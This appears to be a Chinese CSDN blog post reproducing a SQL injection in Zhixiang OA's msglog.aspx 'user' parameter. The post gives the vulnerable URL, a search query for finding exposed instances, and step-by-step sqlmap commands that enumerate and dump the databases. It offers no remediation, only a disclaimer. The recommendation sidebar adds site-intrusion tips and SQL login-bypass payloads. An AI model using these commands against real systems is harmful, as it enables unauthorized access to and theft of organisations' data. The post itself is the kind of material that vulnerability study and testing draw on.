致翔OA msglog.aspx SQL注入漏洞

已于 2022-10-27 18:06:53 修改
阅读量831 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: sql 安全 数据库
于 2022-10-27 16:50:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44881823/article/details/127555130
版权

致翔OA msglog.aspx SQL注入漏洞

漏洞描述

致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息

漏洞影响

致翔OA

网络测绘

app="致翔软件-致翔OA"

漏洞复现

存在漏洞的文件为 msglog.aspx,涉及注入的参数为 user

/mainpage/msglog.aspx?user=1

在这里插入图片描述

python3 sqlmap.py -u http://xx.xx.xx/mainpage/msglog.aspx?user=1
python3 sqlmap.py -u URL --dbs	  #爆库名
python3 sqlmap.py -u URL -D 数据库名称 --tables  #爆表名
python3 sqlmap.py -u URL -D 数据库名称 -T 表名称  --columns	 #爆表字段名
python3 sqlmap.py -u URL -D 数据库名称 -T 表名称  -C 字段名 --dump	#爆字段内容

注:本尘埃の客栈所有文章均为技术分享,用于研究和复现漏洞,请勿非法用于其他用途,否则后果自负!

尘.埃
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通用防SQL注入漏洞程序(Global.asax方式)_aspx开发教程.rar
09-09
通用防SQL注入漏洞程序(Global.asax方式)_aspx开发教程
aspx web入侵渗透经验总结
热门推荐
ccx_john的专栏
12-26 1万+
对一般遇到.net的网站时      1、通常会注册个用户    第一选择利用上传判断的漏洞 加图片头GIF89A 顺利饶过    2、    第二种就是注入了, 在?id=xx后加单引号 '    一般情况下 用NBSI 啊D来SCAN 都可以发现BUG页面    而且国内大多.net都是使用MSSQL数据库    发现注入点也可以从login下手 其实这个方法目前的成功率在75%
畅捷通TPlus keyEdit.aspx、KeyInfoList.aspx SQL注入漏洞复现
最新发布
05-16 373
畅捷通-TPlus是一个为中小企业设计的财税云服务平台,提供财务、税务管理和发票处理功能,支持低代码开发,帮助企业实现数字化和智能化经营管理。
文件操作之文件包含漏洞
weixin_52657559的博客
12-08 1197
文件包含原理,远程包含,本地包含,实例
Aspx漏洞总结
carrot11223的博客
01-23 1289
有时候,这些代码不一定包含在上一层中,有可能是包含在上上层中,这个就得一直翻了,推荐使用idea进行使用,直接按住crtl的同时,点击包含的包,就可以进入到对应的代码中(涉及到代码审计)如果关闭,当页面报错的时候,就是网站定义的报错信息。在java中有很多jar包,而在.NET框架中的bin中对应有很多DLL文件,bin下面都是可执行文件,这些文件都是很多代码封装的,想要查看源码,都需要通过反编译的方式。数据库在两个里不一定是固定的,但是前三个搭配是一定的,iis的问题在aspaspx都会受到影响。
文件上传漏洞总结2
wwwwyyyrre的博客
07-26 623
webshell是web入侵的脚本攻击工具。webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。
zoe-agent-msglog
03-31
《Zoe Agent Msglog:日志管理与分析的Python实现》 在信息技术领域,日志管理是系统监控、故障排查和性能优化的关键环节。Zoe-Agent-msglog 是一个专门用于处理和显示由连接到Zoe代理的日志的工具,它采用Python...
Oracle 11g 部署rman定时备份文档(windows+linux).docx
07-31
`msglog` 参数定义了 RMAN 输出的日志文件路径,这对于监控备份过程和排查问题非常有用。 通过以上步骤,你可以成功地在 Windows 和 Linux 环境中设置 RMAN 定时备份,确保 Oracle 11g 数据库的数据安全性。定期...
使用treeview的简单例子(12KB)...
10-07
`Module1.bas`、`MsgLog.bas`、`Subclass.bas`这些文件可能包含了实现`TreeView`功能的相关模块和子程序。例如,`Module1`可能包含了主程序的逻辑,`MsgLog`可能是日志记录模块,而`Subclass.bas`可能涉及到控件的...
oracle自动清理archivelog文件的具体方法
12-16
[oracle@108 ~]$ rman target/ cmdfile=/home/oracle/del_ora_log.rman msglog=/home/oracle/del_ora_log.rman.log ``` 这将执行RMAN脚本,并将日志输出到`del_ora_log.rman.log`文件中。 3. 将清理脚本加入系统...
蓝凌EIS pdf.aspx 任意文件读取漏洞
Keepb1ue的博客
01-10 791
蓝凌EIS智慧协同平台是一个简单、高效的工作方式专为成长型企业打造的沟通、协同、社交的移动办公平台,覆盖OA、沟通、客户、人事、知识等管理需求,集合了非常丰富的模块,满足组织企业在知识、项目管理系统建设等需求的一款OA系统。蓝凌EIS智慧协同平台pdf.aspx文件存在任意文件读取漏洞。攻击者可通过该漏洞在服务器端读取任意文件敏感内容,可能导致攻击者后续获取到相关的服务器权限。将密文base64解码得到明文,获取敏感信息数据。1、升级至最新安全版本。
Web安全Aspx安全分析总结
weixin_44616206的博客
02-01 2367
Web安全Aspx安全分析总结 dll类似于jar包,可对其进行反编译 .net是C#的框架 .NET源码反编译-DLL反编译 拖进ILSpy 信息泄露 aspx开发网站根目录下web.config配置文件中customError设置,导致报错信息造成的信息泄露 未授权访问 知道可能会有登录状态判定的网页,aspx文件代码+反编译出的dll中找到判断的代码逻辑(仅限白盒测试) 判断用户的身份:由于后台本身有多个功能文件页面判断方法大致可分为两种:1.每个文件里面添加判断的代码 2.单独创建编
致翔OA漏洞学习——msglog.aspx SQL注入漏洞
记录并分享学习安全的知识点..
05-02 2937
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、概述 致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。注:注入参数为user。
入侵ASP.net网站的经验
weixin_30388677的博客
07-12 361
1、对一般遇到.net的网站时通常会注册个用户第一选择利用上传判断的漏洞 加图片头GIF89A 顺利饶过2、第二种就是注入了, 在?id=xx后加单引号 " ' "一般情况下 用NBSI 啊D来SCAN 都可以发现BUG页面而且国内大多.net都是使用MSSQL数据库发现注入点也可以从login下手 其实这个方法目前的成功率在75%3、不过遇到搜索型的,和没错误信息回显的时候 在这里就卡住了大家可...
安全测试--注入扫描 sqlmap
Qton_CSDN的博客
12-16 5480
1.url:  学校图书馆 http://210.38.192.31:81/test.aspx 2 开始使用SQLMAP  解压sqlmap到硬盘 比如D:/sqlmap,打开CMD,输入python D:sqlmapsqlmap.py 就可以用了。 列几个基本命令   ./sqlmap.py –h     //查看帮助信息 ./sqlmap.py –u “http://www...
致翔OA漏洞复现手册
1stPeak's Blog
04-21 3606
前言:致翔OA产品漏洞复现笔记,供自己使用,不定期更新 声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。
aspx和php那个安全,ASPASPX和PHP注入万能漏洞
weixin_26729841的博客
04-12 521
所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。分享给大家、、 希望对大家有所帮助!asp aspx万能密码1:"or "a"="a2:'.).or.('.a.'='.a3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='10...
aspx网页背景图片设置代码_漏洞通告 | 微软SMBv3 Client/Server远程代码执行漏洞(CVE20200796)...
weixin_39609822的博客
11-25 182
前言Microsoft Windows中的Microsoft Server Message Block 3.1.1 (SMBv3)版本中处理压缩数据包的方法存在安全漏洞。远程攻击者可借助特制的压缩数据包利用该漏洞执行任意代码。捷普安全实验室第一时间跟进漏洞研究并提供相应的解决方案。漏洞背景2020年3月11日微软发布3月例行更新,但其中并未公布编号为CVE-2020-0796的高危漏洞资...
rtklib中的msg
07-11
- `msglog`:用于记录消息到日志文件。 通过使用消息结构体和相关的消息处理函数,RTKLIB可以提供丰富的消息机制,方便用户了解程序运行时的状态、错误和警告信息,以及进行相应的处理和调试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值